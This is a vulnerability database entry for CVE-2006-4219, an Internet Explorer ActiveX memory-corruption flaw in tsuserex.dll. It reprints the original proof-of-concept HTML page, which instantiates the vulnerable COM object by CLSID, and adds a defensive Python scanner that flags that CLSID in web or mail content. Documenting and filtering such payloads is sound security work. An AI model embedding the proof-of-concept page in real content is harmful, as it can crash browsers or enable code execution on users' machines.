Microsoft Internet Explorer 'TSUserEX.DLL' ActiveX Control Memory Corruption Vulnerability

Vulnerability ID: 1110837    Vulnerability type: Boundary condition error
Published: 2006-08-17    Updated: 2006-08-21
CVE ID: CVE-2006-4219    CNNVD-ID: CNNVD-200608-304
Platform: Windows    CVSS score: 7.5
|Vulnerability source
https://www.exploit-db.com/exploits/28400
https://cxsecurity.com/issue/WLB-2006080112
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200608-304
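|Vulnerability details
In the Internet Explorer 6.0 SP1 browser on the Microsoft Windows 2003 EE SP1 CN operating system, a remote attacker can trigger a denial of service, and possibly execute arbitrary code, by instantiating the Terminal Services COM object (tsuserex.dll) as an ActiveX object.
|Vulnerability exploit (EXP)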
source: http://www.securityfocus.com/bid/19570/info

Microsoft Internet Explorer is prone to a memory-corruption vulnerability. This is related to the handling of the 'tsuserex.dll' COM object ActiveX control.

Attackers may exploit this issue via a malicious web page to execute arbitrary code in the context of the currently logged-in user. Exploitation attempts may lead to a denial-of-service condition as well. Attackers may also employ HTML email to carry out an attack.


=============== tsuserex.dll.htm start ================

<!--
// Microsoft Windows 2003 (tsuserex.dll) COM Object Instantiation Vulnerability
// tested on Windows 2003 EE SP1 CN

// http://www.xsec.org
// nop (nop#xsec.org)

// CLSID: {E2E9CAE6-1E7B-4B8E-BABD-E9BF6292AC29}
// Info: ADsTSUserEx Class
// ProgID: tsuserex.ADsTSUserEx.1
// InprocServer32: C:\WINDOWS\system32\tsuserex.dll

--!>

<html><body>
<object classid="CLSID:{E2E9CAE6-1E7B-4B8E-BABD-E9BF6292AC29}"> </object>
</body>
</html>

=============== tsuserex.dll.htm end ==================
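
Added example (not part of the original advisory or of this database entry): a Python scanner that a mail or web content filter could use to flag HTML that instantiates the ADsTSUserEx class through an `<object>` tag, using the CLSID listed in the advisory comment above. The function names and the sample input are constructed for illustration.

```python
from html.parser import HTMLParser
import re

# CLSID of the ADsTSUserEx class (tsuserex.dll), as listed in the advisory on this page.
TSUSEREX_CLSID = "E2E9CAE6-1E7B-4B8E-BABD-E9BF6292AC29"

def normalize_classid(value):
    """Reduce a classid attribute value to a bare upper-case GUID, or None."""
    if not value:
        return None
    m = re.fullmatch(r"\s*clsid:\s*\{?\s*([0-9a-f-]{36})\s*\}?\s*", value, re.IGNORECASE)
    return m.group(1).upper() if m else None

class _ObjectTagScanner(HTMLParser):
    """Collects (line, GUID) for every <object> whose classid is on the block list."""
    def __init__(self, blocked):
        super().__init__(convert_charrefs=True)
        self.blocked = blocked
        self.hits = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lower-cases tag and attribute names and decodes character
        # references in values, so the comparison runs on the normalised value.
        if tag != "object":
            return
        guid = normalize_classid(dict(attrs).get("classid"))
        if guid in self.blocked:
            self.hits.append((self.getpos()[0], guid))

def find_blocked_objects(html, blocked=frozenset({TSUSEREX_CLSID})):
    """Return [(line_number, GUID), ...] for blocked COM classes referenced in html."""
    scanner = _ObjectTagScanner(blocked)
    scanner.feed(html)
    scanner.close()
    return scanner.hits

# Constructed sample input: two spellings of the advisory's CLSID and one
# unrelated placeholder GUID that must not be flagged.
SAMPLE = """<html><body>
<object classid="CLSID:{E2E9CAE6-1E7B-4B8E-BABD-E9BF6292AC29}"> </object>
<OBJECT id=x ClassID='clsid:e2e9cae6-1e7b-4b8e-babd-e9bf6292ac29'></OBJECT>
<object classid="clsid:11111111-2222-3333-4444-555555555555"></object>
</body></html>"""

if __name__ == "__main__":
    for line, guid in find_blocked_objects(SAMPLE):
        print(f"line {line}: <object> references blocked CLSID {{{guid}}}")
```

The `blocked` set can hold further CLSIDs, so the same scan covers other COM classes that should never be instantiated from web or e-mail content.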
|References

Source: MISC
Link: http://www.xsec.org/index.php?module=Releases&act=view&type=1&id=14
Source: BID
Name: 19570
Link: http://www.securityfocus.com/bid/19570
Source: BUGTRAQ
Name: 20060817 [XSec-06-06]: Windows 2003 (tsuserex.dll) COM Object Instantiation Vulnerability
Link: http://www.securityfocus.com/archive/1/archive/1/443493/100/0/threaded
Source: XF
Name: ie-tsuserex-dos(28444)
Link: http://xforce.iss.net/xforce/xfdb/28444
Source: SREASON
Name: 1403
Link: http://securityreason.com/securityalert/1403